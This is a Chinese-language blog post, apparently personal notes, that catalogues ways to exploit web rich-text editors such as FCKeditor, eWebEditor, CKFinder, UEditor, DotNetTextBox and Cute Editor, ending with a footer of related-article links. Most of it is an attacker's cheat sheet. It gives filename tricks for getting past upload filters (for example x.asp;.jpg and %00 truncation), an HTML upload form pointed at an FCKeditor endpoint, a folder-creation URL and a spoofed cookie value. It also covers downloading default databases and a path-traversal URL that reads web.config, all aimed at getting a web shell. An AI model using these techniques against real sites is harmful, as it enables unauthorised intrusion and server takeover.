常见编辑器漏洞

最新推荐文章于 2024-06-29 11:07:23 发布
最新推荐文章于 2024-06-29 11:07:23 发布
阅读量6.1k 收藏 14
点赞数 1
分类专栏: 编辑器漏洞总结 文章标签: 编辑器漏洞 总结 笔记 漏洞总结
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zdy8023/article/details/88824538
版权

编辑器利用

查找编辑器目录

  • 目录扫描
  • 目录遍历
  • 蜘蛛爬行          

漏洞利用

  • 百度相关编辑器漏洞利用

FCKeditor编辑器页/查看编辑器版本/查看文件上传路径

  • FCKeditor编辑器页
  • FCKeditor/_samples/default.html
  • 查看编辑器版本
  • FCKeditor/_whatsnew.html
  • 查看文件上传路径
  • fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

查看上传目录

  • XML页面中第二行"url=/xxx"的部分就是默认基准上传路径
  • FCKeditror被动限制策略所导致的过滤不严问题
  • 影响版本:FCKeditor x.x <= FCKeditor v2.4.3

脆弱性描述

  • FCKeditor v2.4.3中File类别默认拒绝上传类型
  • html |htm| php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|
  • pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
  • Fckeditor 2.0 <=2.2 允许上传asa、cer、php2、php4、inc、pwnl、pht后缀的文件
  • 上传后 它保存的文件直接用的$sFilePath =$sServerDir.$sFileName,而没有使用$sExtension为后缀
  • 直接导致在win下在上传文件后面加个.来突破
  • 而在apache下,因为"Apache文件名解析缺陷漏洞”也可以利用之

漏洞版本

  • windows有任意文件上传漏洞如x.asp;.jpg
  • Apache+linux环境下在上传文件后面加个.突破!测试通过

Version <=2.4.2 For php

在处理PHP在上传的地方并未对media类型进行进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址

<form id="fmUpload" enctype="multipart/form-data"

action="http://www.site.com/FCKeditor/editor?filemanage/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>

<input type="file" name ="NewFile" size="50"><br>

<input id="btnUpload" type="submit" value="Upload">

</form>

FCKeditor 文件上传“.”变“_”下划线的绕过方法

  • 很多时候上传的文件例如: shell.php.rar 或者shell.php;.jpg会变为shell_php;.jpg这是新版FCK的变化
  • 提交shell.php+空格绕过
  • 不过空格只支持win系统*nix是不支持的[shell.php 和shell.php+空格是2个不同的文件 未测试
  • 继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制

突破建立文件夹

 

 FCKeditor_2.5/editor/filemanager/connectors/asp/connector.aspCommand=Createfolder&Type=Image&Currentfolder=/xx.asp&NewFoldername=x.asp

FCKeditor中test文件的上传地址

  • FCKeditor/editor/filemanager/browser/default/connectors/test.html
  • FCKeditor/editor/filemanager/upload/test.html
  • FCKeditor/editor/filemanager/connectors/test.html
  • FCKeditor/editor/filemanager/connectors/uploadtest.html

绕过asp;.jpg变asp_jpg

  • 使用特殊名称绕过
  • a.aspx.a;.a.aspx.jpg..jpg.aspx
  • xx.asp.;.jpg

EWEbeditor

1.进后台   

  • 通过弱口令
  • 下载默认数据库   ewebeditor/db/ewebeditor.mdb
  • burp抓包爆破
  • 利用注入点得到密码

如果没有后台

利用目录遍历漏洞,找网站数据库位置下载网站数据库,登录网站后台拿shell

利用exp进行

构造上传

2.修改上传类型

3.自己添加上传样式以后添加上传按钮一一上传

CKFinder

任意文件上传漏洞

  • 其1.4.3 asp.net版本存在任意文件上传漏洞,攻击者可以利用该漏洞上传任意文件,CKFinder在上传文件的时候,强制将文件名(不包括后缀)中点号等其他字符转为下划线_,但是在修改文件名时却没有任何限制,从而导致可以上传1_php;1.jpg等畸形文件名,最终导致文件上传漏洞
  • 然后修改文件名
  • 1_php;1.jpg
  • 利用iis6.0目录解析漏洞拿shell
  • 创建目录/x.asp/
  • 在目录下上传图片马即可拿shell

南方数据编辑器southidceditor

首先登陆后台

利用编辑器上传

访问admin/southidceditor/admin_style.asp

修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传

UEDITOR

  • 利用ii6.0文件名解析漏洞
  • 上传图片改名为
  • x.php;20221.jpg获取shell

DotNetTextBox编辑器漏洞

  • 关键字:system_dntb/
  • 确定有system_dntb/uploadimg.aspx并能打开,这时候是不能上传的,由于他是验证cookie来得出上传后的路径,这样我们可以用cookie欺骗工具
  • cookie:UserType=0;IsEdition=0;Info=1;
  • uploadFolder=../system_dntb/Upload/;
  • 路径可以修改,只要权限够,上传后改名为1.asp;.jpg利用iis解析漏洞

PHPWEB网站管理系统后台Kedit编辑器

  • 两种利用方式
  • 第一种是利用iis6.0文件名解析漏洞
  • xx.php;xx.jpg
  • 第二种方式
  • %00截断
  • xx.php%00jpg

Cute Editor 在线编辑器本地包含漏洞

  • 影响版本:
  • Cute Editor For Net 6.4
  • 脆弱描述
  • 可以随意查看网站文件内容,危害较大
  • 攻击利用

http://www.xx.com/Cute_Client?CuteEditor/Load.ashx?type=image&file=../../../web.config

等等编辑器漏洞,其余特殊编辑器漏洞,需要时可自行百度查找他们的漏洞

努力奋斗的小青年
关注
  • 1
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网页编辑器漏洞大全
07-13
涵盖了诸如常见的FCKeditor、eWebEditor、Cuteditor、Freetextbox、Webhtmleditor、Kindeditor、所谓的eWebEditorNET、所谓的 southidceditor、所谓的bigcneditor
常见编辑器漏洞汇总【超全】(转载)
00勇士王子的博客
09-15 5111
以前挖某站发现使用了编辑器,想用通用漏洞探一探,奈何当时无从下手,这件事就放到了我的心上,就去学习了此方面的知识,了解了一些思路,把编辑器漏洞汇总到了一起,分享给想要了解这方面漏洞的小伙伴首先介绍什么是编辑器:编辑器是非常好用的网页在线编辑器,顾名思义就是让我们的用户可以在网页上进行文本的编辑,可以在网页上设置字体的样式段落行间距类似于用word编辑比较方便,并将工具生成得到的html样式插入到数据库中我们可以右键,审查元素,查看js 文件文件内容标识。
技术分享-ueditor漏洞利用&源码分析超详细分析
最新发布
cc123489ll的博客
06-29 973
ueditor的漏洞主要存在于其上传功能中,攻击者可以利用上传漏洞恶意脚本上传到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。ueditor的上传功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件上传的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上传文件的后缀名是否在指定的白名单之内。
实战纪实 | 编辑器漏洞之Ueditor-任意文件上传漏洞 (老洞新谈)
zkaqlaoniao的博客
04-12 9648
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor的漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
html编辑器渗透,渗透测试之编辑器漏洞与旁注、跨目录、跨库、CDN绕过
weixin_29315091的博客
06-15 432
常用的编辑器常见编辑器有Ewebeditor fckeditor CKeditor kindeditor1.Ewebeditor测试环境用的是eWebEditor_v216_Free版本 可以自己去网上下载对应的版本搭建本地环境利用核心默认后台:www.xxxx.com/ewebeditor/admin_login.asp默认数据库:ewebeditor/db/ewebeditor.mdb...
常见编辑器漏洞
jkant的专栏
03-16 2821
比如常见编辑器漏洞有:ewebeditor  ewebeditornet    fckeditoreditor   southidceditor SouthidcEditorbigcneditor一:ewebeditor为例1:默认下载下来的后台:   http://www.test.com/ewebeditor/admin_login.asp后台如果能进入:可点击样式管
常用网页编辑器漏洞手册(全面版)fckeditor,ewebeditor
10-28
FCKeditor和EWebEditor是两种常见的网页编辑器,但它们也存在一些安全漏洞,这些漏洞可能会对网站造成严重威胁。下面我们将详细讨论这两个编辑器漏洞及其可能的影响。 首先,FCKeditor的漏洞主要包括过滤不严的...
15-编辑器漏洞1
08-03
编辑器漏洞通常出现在富文本编辑器(如FCKeditor)中,由于编辑器在处理文件上传时的安全控制不足,使得攻击者有机会上传任意文件。标题中的"15-编辑器漏洞1"指的是针对编辑器的某一种具体漏洞实例。 3. **编辑器...
FCK编辑器漏洞综合利用工具
03-07
"FCK编辑器漏洞综合利用工具"正是针对这种情况设计的,它主要用于检测和利用FCK编辑器中的已知安全漏洞。 首先,我们需要了解什么是漏洞。在计算机科学和网络安全领域,漏洞是指软件、操作系统或网络服务中存在的...
(转载)sinaeditor漏洞
aocong5568的博客
08-12 138
SinaEditor简介 SinaEditor是基于新浪博客编辑器的开源编辑器。您可以用它来编辑富文本内容。 编辑器的核心是一个执行队列的调度系统,加入插件来实现功能,并通过事件来驱动编辑器的运行。我们对事件进行了一次封装,有效的解决了匿名事件函数不能回收的问题,减少内存占用的情况。 特性 所有的功能基于插件方式编写。可以自由配置功能。 提供了Range的API。对IE的t...
基于PHP的UEditor
07-15
部署在PHP的UEditor,关键点还在路径配置上,有什么问题,可以和我交流。QQ:70747053.博客地址:http://blog.csdn.net/leamonlm
百度编辑器UEditor v1.4.3 PHP版 GBK
05-10
UEditor1.4.3更新说明修复hasContents接口在非ie下只有空格时判断还为真的问题 修复在粘贴word内容时,会误命中cm,pt这样的文本内容变成px的问题 优化删除编辑器再创建编辑器时,编辑器的容器id发生变化的问题 修复提交jsonp请求时,callback参数的xss漏洞 新增jsp后台多种服务器配置下的路径定位 修复ZeroClipboard的flash地址参数名称错误 修复getActionUrl的bug 整理配置参数,把遗漏在代码中的配置项整理到ueditor.config.js里 修复图片拉伸工具和编辑拉伸长高器的样式冲突 修复文字的unicod
system_dntb 编辑器漏洞
收集盒 Book box
07-07 9917
漏洞文件system_dntb/uploadimg.aspx  由于他是验证cookie来得出上传后的路径,这样我们可以用cookie欺骗工具。 cookie:UserType=0; IsEdition=0; Info=1; uploadFolder=../system_dntb/Upload/; 路径可以修改,只是权限够,上传后改名为1.asp;.jpg利用iis解析漏洞
ueditor php漏洞,ueditor getshell漏洞重现及分析
weixin_33520805的博客
03-23 1720
0x00 概述8月21日,网上爆出ueditor .net版本getshell漏洞,由于只校验ContentType而没校验文件后缀导致getshell。0x01 漏洞重现Payload:shelladdr:图片马x.jpg放在自己服务器上提交http://www.domain.top/x.jpg?.aspx 返回: 菜刀连接: 0x02 修复方案增加文件扩展名校验(白名单)0x03 漏洞分析u...
ueditor漏洞php如何解决,玩UEditor的几个让人蛋疼的问题、、、、 教你玩转PHP
weixin_34668147的博客
03-28 581
首先UEditor1.4.3以上版本将不再承诺支持ie6/7、所以一个网站还是抛弃这两个浏览器版本的兼容问题吧、、你可以用前一个版本的、如果你的页面代码是UTF8的那么恭喜、你可以完美滴用随便用、直接用官网的js地址都是可以的如果你的页面编码是GBK、那么恭喜你、杯具了、不要在意编辑器还提供的GBK版本、我不会告诉你那压根没法用、、因为有BUG首先你会遇到这么几个特蛋疼的问题、一是样式加载不了、特...
ueditor php漏洞,GitHub - fex-team/ueditor: rich text 富文本编辑器
weixin_32534669的博客
03-23 372
Get Started鉴于目前 ISSUE 较多而维护时间较少,且在进行后续的版本更新,目前暂时关闭 ISSUE,若社区有人跟进,欢迎和我们联系。重复的问题,请参阅常见问题的 FAQ Wiki。重要安全通告:commons-fileupload-1.3.1.jar 存在漏洞可能会导致 ddos,源代码中已经修改,使用老版本的用户,强烈推荐升级 commons-fileupload.jar 至最新版...
ueditor 漏洞 php_【组件攻击链】ThinkCMF 高危漏洞分析与利用
weixin_39641103的博客
11-21 708
ThinkCMF 高危漏洞分析与利用一、组件介绍1.1 基本信息ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,该系统的用户无需关心开发SNS应用是如何工作的,但他们之间又可通过...
ueditor getshell漏洞重现及分析
weixin_30681121的博客
12-07 1288
0x00 概述 8月21日,网上爆出ueditor .net版本getshell漏洞,由于只校验ContentType而没校验文件后缀导致getshell。 0x01 漏洞重现 Payload: <formaction=”http://www.xxx.com/controller.ashx?action=catchimage”enctype=”application/x-w...
WEB编辑器漏洞大全:从FCK到eWebEditor
总结,"WEB编辑器漏洞手册"是一份宝贵的资源,它揭示了WEB编辑器中的常见安全问题,提醒了网站管理员和开发人员关注这些潜在的威胁,并采取必要的措施来加固他们的系统。通过定期更新和社区合作,这样的手册可以帮助...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值